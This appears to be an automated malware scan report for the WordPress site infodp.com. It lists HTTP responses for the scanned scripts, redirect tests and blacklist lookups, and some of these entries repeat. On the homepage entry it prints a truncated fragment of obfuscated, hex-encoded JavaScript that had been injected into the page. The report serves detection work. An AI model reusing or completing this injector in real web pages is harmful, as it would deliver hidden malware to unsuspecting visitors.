Scanned pages/files
Request | Server response | Status |
http://www.infodp.com/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Thu, 09 Oct 2014 04:25:32 GMT Pragma: no-cache Location: http://infodp.com/ Server: nginx/1.6.2 Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT X-Pingback: http://infodp.com/xmlrpc.php | clean |
http://infodp.com/ | 200 OK Content-Length: 55866 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) sp=\"s\"+\"p\"+\"li\"+\"t\";w=window;z=\"dy\";d=document;aq=\"0x\";bv=(5-3-1);try{++(d.body)}catch(d21vd12v){vzs=false;try{}catch(wb){vzs=21;}if(1){f=\"17:5d:6c:65:5a:6b:60:66:65:17:6a:6e:67:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6a:6e:67:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4: Antivirus reports:
| ||
http://infodp.com/wp-includes/js/jquery/jquery.js?ver=1.11.0 | 200 OK Content-Length: 96402 Content-Type: application/javascript | clean |
http://infodp.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://infodp.com/wp-content/plugins/optimizePressPlugin/lib/js/jquery/jquery.noconflict.min.js?ver=2.1.9.5 | 200 OK Content-Length: 1142 Content-Type: application/javascript | clean |
http://infodp.com/wp-content/plugins/optimizePressPlugin/lib/js/jquery/jquery.loadScript.min.js?ver=2.1.9.5 | 200 OK Content-Length: 301 Content-Type: application/javascript | clean |
http://infodp.com/wp-content/themes/socrates/functions/ajax-contact/ajax-contact.js?ver=3.9.2 | 200 OK Content-Length: 2422 Content-Type: application/javascript | clean |
http://infodp.com/wp-includes/js/zxcvbn-async.min.js?ver=1.0 | 200 OK Content-Length: 324 Content-Type: application/javascript | clean |
http://infodp.com/wp-admin/js/password-strength-meter.min.js?ver=3.9.2 | 200 OK Content-Length: 737 Content-Type: application/javascript | clean |
http://infodp.com/wp-content/plugins/optimizeMember/optimizeMember-o.php?ws_plugin__optimizemember_js_w_globals=1&qcABC=1&ver=1.0.8-1.0.8-844702110 | 200 OK Content-Length: 47036 Content-Type: application/x-javascript | clean |
http://infodp.com/wp-content/themes/socrates/scripts/scripts-active.js?ver=1.0 | 200 OK Content-Length: 3333 Content-Type: application/javascript | clean |
http://infodp.com/wp-content/themes/socrates/scripts/myStuff.js?ver=1.0 | 200 OK Content-Length: 1143 Content-Type: application/javascript | clean |
http://infodp.com/wp-content/themes/socrates/scripts/supersleight.plugin.js?ver=1.0 | 200 OK Content-Length: 1545 Content-Type: application/javascript | clean |
http://infodp.com/wp-content/themes/socrates/slider/jquery.nivo.slider.pack.js?ver=2.7 | 200 OK Content-Length: 11561 Content-Type: application/javascript | clean |
http://infodp.com/wp-content/themes/socrates/scripts/prettyphoto/js/jquery.prettyPhoto.js?ver=3.0.1 | 200 OK Content-Length: 21878 Content-Type: application/javascript | clean |
http://infodp.com/wp-content/plugins/optimizePressPlugin/lib/js/jquery/jquery.placeholder.min.js?ver=2.1.9.5 | 200 OK Content-Length: 1960 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: infodp.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate, max-age=0
Connection: close
Date: Thu, 09 Oct 2014 04:25:33 GMT
Pragma: no-cache
Server: nginx/1.6.2
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
X-Pingback: http://infodp.com/xmlrpc.php
GET / HTTP/1.1
Host: infodp.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate, max-age=0
Connection: close
Date: Thu, 09 Oct 2014 04:25:33 GMT
Pragma: no-cache
Server: nginx/1.6.2
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
X-Pingback: http://infodp.com/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: infodp.com
Referer: http://www.google.com/search?q=infodp.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: infodp.com
Referer: http://www.google.com/search?q=infodp.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=infodp.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://infodp.com/
Result: infodp.com is not infected or malware details are not published yet.
Result: infodp.com is not infected or malware details are not published yet.